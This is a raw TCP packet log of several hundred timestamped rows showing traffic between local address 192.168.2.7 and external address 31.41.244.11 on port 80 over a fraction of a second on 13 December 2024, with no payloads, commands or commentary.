Dec 13, 2024 18:53:52.971786022 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.971786022 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.973861933 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.973897934 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.973923922 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.973956108 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.976139069 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.976175070 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.976200104 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.976229906 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.978312016 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.978346109 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.978373051 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.978400946 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.980483055 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.980518103 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.980546951 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.980576992 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.982726097 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.982788086 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.982825041 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.982877016 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.984946012 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.984980106 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.985008001 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.985038042 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.987389088 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.987423897 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.987449884 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.987473965 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.989269018 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.989329100 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.989331961 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.989387989 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.991738081 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.991790056 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.991802931 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.991842985 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.993685007 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.993742943 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.993782997 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.993843079 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.996021986 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.996038914 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.996088028 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.996131897 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.998146057 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.998162031 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.998203993 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.998234987 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.000360966 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.000375986 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.000418901 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.000449896 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.002613068 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.002629042 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.002674103 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.002707005 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.004750013 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.004802942 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.004811049 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.004856110 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.006923914 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.006982088 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.007013083 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.007097006 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.009166002 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.009217978 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.009412050 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.009565115 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.011367083 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.011423111 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.011508942 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.011559963 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.013683081 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.013698101 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.013731003 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.013761997 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.015690088 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.015750885 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.015829086 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.015885115 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.017919064 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.017975092 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.018053055 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.018099070 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.020210981 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.020226002 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.020296097 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.020297050 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.022391081 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.022458076 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.022540092 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.022593975 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.024668932 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.024686098 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.024734974 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.024734974 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.027103901 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.027129889 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.027167082 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.027199030 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.029076099 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.029092073 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.029134989 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.029166937 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.031271935 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.031342983 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.031491041 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.031552076 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.033555984 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.033581018 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.033622026 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.033725023 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.035686970 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.035702944 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.035741091 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.035778999 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.037875891 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.037934065 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.038002014 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.038059950 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.040159941 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.040177107 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.040211916 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.040241957 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.042534113 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.042550087 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.042602062 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.044580936 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.044595957 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.044640064 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.044672966 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.046776056 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.046792984 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.046833038 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.046833038 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.048926115 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.048943043 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.048984051 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.049015999 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.126662970 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.126713037 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.126863003 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.126863003 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.127372980 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.127438068 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.127480030 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.127538919 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.129156113 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.129215002 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.129266024 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.129327059 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.130966902 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.131028891 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.131073952 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.131130934 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.132608891 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.132667065 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.132744074 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.132800102 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.134412050 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.134465933 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.134486914 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.134541035 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.136102915 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.136137962 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.136163950 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.136184931 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.137654066 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.137711048 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.137808084 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.137861967 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.139301062 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.139360905 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.139488935 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.139545918 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.140906096 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.140960932 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.140986919 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.141037941 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.142601013 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.142636061 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.142656088 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.142692089 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.144251108 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.144315004 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.144354105 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.144409895 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.145751953 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.145823956 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.145925045 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.145968914 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.147209883 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.147270918 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.147512913 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.147582054 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.148952007 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.148987055 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.149019957 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.149051905 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.150607109 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.150640965 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.150671005 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.150693893 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.152198076 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.152234077 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.152262926 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.152293921 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.153367996 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.153424978 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.153479099 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.153527975 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.154872894 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.154931068 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.154999971 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.155050993 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.156461000 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.156522989 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.156651020 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.156709909 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.157812119 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.157872915 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.157958031 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.158018112 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.159387112 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.159421921 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.159441948 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.159472942 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.160748005 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.160809994 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.160842896 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.160901070 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.162211895 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.162280083 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.162318945 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.162369013 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.163810015 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.163845062 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.163865089 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.163892984 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.165087938 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.165123940 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.165152073 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.165179968 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.166604042 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.166660070 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.166702986 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.166752100 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.168112040 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.168147087 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.168173075 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.168200970 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.169461966 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.169497967 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.169522047 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.169552088 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.170751095 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.170809984 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.171133041 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.171191931 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.172209978 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.172244072 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.172272921 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.172301054 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.173543930 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.173578978 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.173609018 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.173640966 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.174814939 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.174874067 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.174923897 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.174984932 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.176232100 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.176317930 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.176382065 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.177762985 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.177823067 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.177871943 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.178034067 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.179414988 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.179471970 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.179584980 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.179641962 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.180974007 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.181010962 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.181039095 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.181073904 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.182359934 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.182425022 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.182466984 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.182528973 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.183490038 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.183543921 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.183553934 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.183598995 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.184745073 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.184843063 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.184906006 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.186153889 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.186189890 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.186244011 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.187391996 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.187427044 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.187490940 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.188725948 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.188782930 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.188920975 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.188982010 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.190021992 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.190076113 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.190079927 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.190134048 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.191371918 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.191503048 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.191550970 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.191584110 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.192866087 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.192900896 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.192960024 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.194202900 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.194237947 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.194261074 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.194292068 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.195571899 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.195653915 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.195717096 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.195775032 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.196990967 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.197027922 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.197088003 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.198324919 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.198379040 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.198441982 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.199609995 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.199672937 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.199757099 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.199817896 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.201036930 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.201092005 CET	49917	80	192.168.2.7	31.41.244.11
